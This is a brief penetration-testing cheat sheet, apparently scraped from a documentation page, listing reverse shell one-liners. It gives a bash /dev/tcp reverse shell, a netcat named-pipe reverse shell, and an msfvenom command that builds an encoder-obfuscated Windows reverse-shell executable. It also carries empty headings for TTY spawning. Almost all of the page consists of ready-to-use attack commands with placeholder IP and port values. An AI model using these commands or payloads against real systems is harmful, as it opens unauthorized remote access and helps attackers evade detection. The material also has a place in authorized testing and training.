Reverse Shell
One-Liners
Bash
bash -i >& /dev/tcp/<IP>/<port> 0>&1Netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/fGenerate Payload
Msfvenom
Windows reverse shell with encoder
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=<Your IP> LPORT=<Listening Port> -f exe -o <Shell Name>.exeShell Cushions
Spawn TTY
Python
Auto-Completion
Last updated